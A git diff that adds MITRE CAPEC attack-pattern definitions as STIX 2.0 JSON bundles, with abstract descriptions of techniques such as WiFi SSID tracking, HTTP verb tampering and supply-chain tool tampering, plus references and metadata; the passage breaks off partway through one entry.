[ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.", + "external_references": [ + { + "external_id": "CAPEC-613", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/613.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "modified": "2019-09-30T00:00:00.000Z", + "name": "WiFi SSID Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and open databases of known WiFi SSID addresses are available online." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json new file mode 100644 index 0000000000000000000000000000000000000000..52da429b5e9a11718ffe004c84be20c8b728701b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--2ad6b4ba-4549-4dd2-bc9b-b9f4c3c567c4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.", + "external_references": [ + { + "external_id": "CAPEC-257", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/257.html" + } + ], + "id": "attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Abuse of Transaction Data Structure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json new file mode 100644 index 0000000000000000000000000000000000000000..8732aff576e9265e43af544a27f17d200e401639 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json @@ -0,0 +1,85 @@ +{ + "id": "bundle--a3bf3520-5f52-4328-971d-a978a4de3dc0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.", + "external_references": [ + { + "external_id": "CAPEC-324", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/324.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Sequence Predictability Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json new file mode 100644 index 0000000000000000000000000000000000000000..d23188cdcc1cfd88e55e26ec81fff4a46af6cea8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json @@ -0,0 +1,59 @@ +{ + "id": "bundle--bd4bd57c-622a-4776-8dee-6cf204fcd9de", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.", + "external_references": [ + { + "external_id": "CAPEC-240", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/240.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "description": "Resource Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Resource_Injection" + } + ], + "id": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Resource Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4" + ], + "x_capec_prerequisites": [ + "The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json new file mode 100644 index 0000000000000000000000000000000000000000..fba27de54e0dc3e25769b0b3122cef916bbff565 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json @@ -0,0 +1,65 @@ +{ + "id": "bundle--f5965262-a64c-465b-8d62-96b3d3ad1008", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.", + "external_references": [ + { + "external_id": "CAPEC-438", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/438.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Marcus Sachs, Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization, Verizon, Inc.", + "external_id": "REF-380", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Thea Reilkoff, Hardware Trojans: A Novel Attack Meets a New Defense, 2010, Yale School of Engineering and Applied Science", + "external_id": "REF-381", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Modification During Manufacture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json new file mode 100644 index 0000000000000000000000000000000000000000..e612486d948d71d89287a27375eca9bc34cbabe0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json @@ -0,0 +1,53 @@ +{ + "id": "bundle--5689cc74-34df-4969-a05e-a8873b3fbae5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-441", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Malicious Logic Insertion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_prerequisites": [ + "Access to the component currently deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json new file mode 100644 index 0000000000000000000000000000000000000000..4fbe3d59a05c913e5ae1c04258253cc4ce99ec56 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json @@ -0,0 +1,58 @@ +{ + "id": "bundle--99c9f361-5e1c-43cb-a352-53633f050e9b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies the HTTP Verb (e.g. GET, PUT, TRACE, etc.) in order to bypass access restrictions. Some web environments allow administrators to restrict access based on the HTTP Verb used with requests. However, attackers can often provide a different HTTP Verb, or even provide a random string as a verb in order to bypass these protections. This allows the attacker to access data that should otherwise be protected.", + "external_references": [ + { + "external_id": "CAPEC-274", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/274.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Arshan Dabirsiaghi, Bypassing Web Authentication and Authorization with HTTP Verb Tampering: How to inadvertently allow attackers full access to your web application, Aspect Security", + "external_id": "REF-118", + "source_name": "reference_from_CAPEC", + "url": "http://mirror.transact.net.au/sourceforge/w/project/wa/waspap/waspap/Core/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf" + } + ], + "id": "attack-pattern--13d1d169-0023-41e2-952f-7d794844733b", + "modified": "2019-09-30T00:00:00.000Z", + "name": "HTTP Verb Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted system must attempt to filter access based on the HTTP verb used in requests." + ], + "x_capec_resources_required": [ + "The attacker requires a tool that allows them to manually control the HTTP verb used to send messages to the targeted server." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json new file mode 100644 index 0000000000000000000000000000000000000000..51e37706bef5a244e06788fd3070faaef5ac33b1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json @@ -0,0 +1,51 @@ +{ + "id": "bundle--10793f96-eabc-406f-85f1-25ea3bd8a085", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.", + "external_references": [ + { + "external_id": "CAPEC-551", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Modify Existing Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json new file mode 100644 index 0000000000000000000000000000000000000000..071e15a7d76bef7958cf139f8b93729e3029990f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json @@ -0,0 +1,68 @@ +{ + "id": "bundle--669a79e2-a0ea-42de-8a50-2090a210da7d", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-648", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/648.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Screen Capture", + "external_id": "T1113", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1113" + }, + { + "description": "Screen Capture", + "external_id": "T1513", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1513" + } + ], + "id": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Screen Capture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to capture potentially sensitive information and processes as they appear on the screen.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json new file mode 100644 index 0000000000000000000000000000000000000000..898edf32ac0de477b6e2a4cb4c455c62d979187b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json @@ -0,0 +1,92 @@ +{ + "id": "bundle--e4b72343-a035-4004-b739-da1e86c3e14c", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.", + "external_references": [ + { + "external_id": "CAPEC-670", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/670.html" + }, + { + "description": "Trusted Developer Utilities Proxy Execution", + "external_id": "T1127", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1127" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor, 2020--12---13, Schneier on Security", + "external_id": "REF-667", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + } + ], + "id": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Software Development Tools Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software." + ], + "x_capec_skills_required": { + "High": "Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json new file mode 100644 index 0000000000000000000000000000000000000000..ec1f25fdd5ac1ed517c2b0c3125b3977a8bbd8a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json @@ -0,0 +1,60 @@ +{ + "id": "bundle--5b4ad572-cd01-410d-ba98-da23cde3e0bb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions.", + "external_references": [ + { + "external_id": "CAPEC-166", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/166.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-1221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1221.html" + }, + { + "external_id": "CWE-1232", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1232.html" + } + ], + "id": "attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Force the System to Reset Values", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn't obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.\n ", + "x_capec_prerequisites": [ + "The targeted application must have a reset function that returns the configuration of the application to an earlier state.", + "The reset functionality must be inadequately protected against use." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. In some cases, the attacker may need special client applications in order to execute the reset functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json new file mode 100644 index 0000000000000000000000000000000000000000..b1860e74de1973aacddc0672dd8526b6fc49bffe --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json @@ -0,0 +1,48 @@ +{ + "id": "bundle--83ba54eb-b149-4aae-aaeb-ab76d2afc911", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures.", + "external_references": [ + { + "external_id": "CAPEC-202", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/202.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Create Malicious Client", + "object_marking_refs": 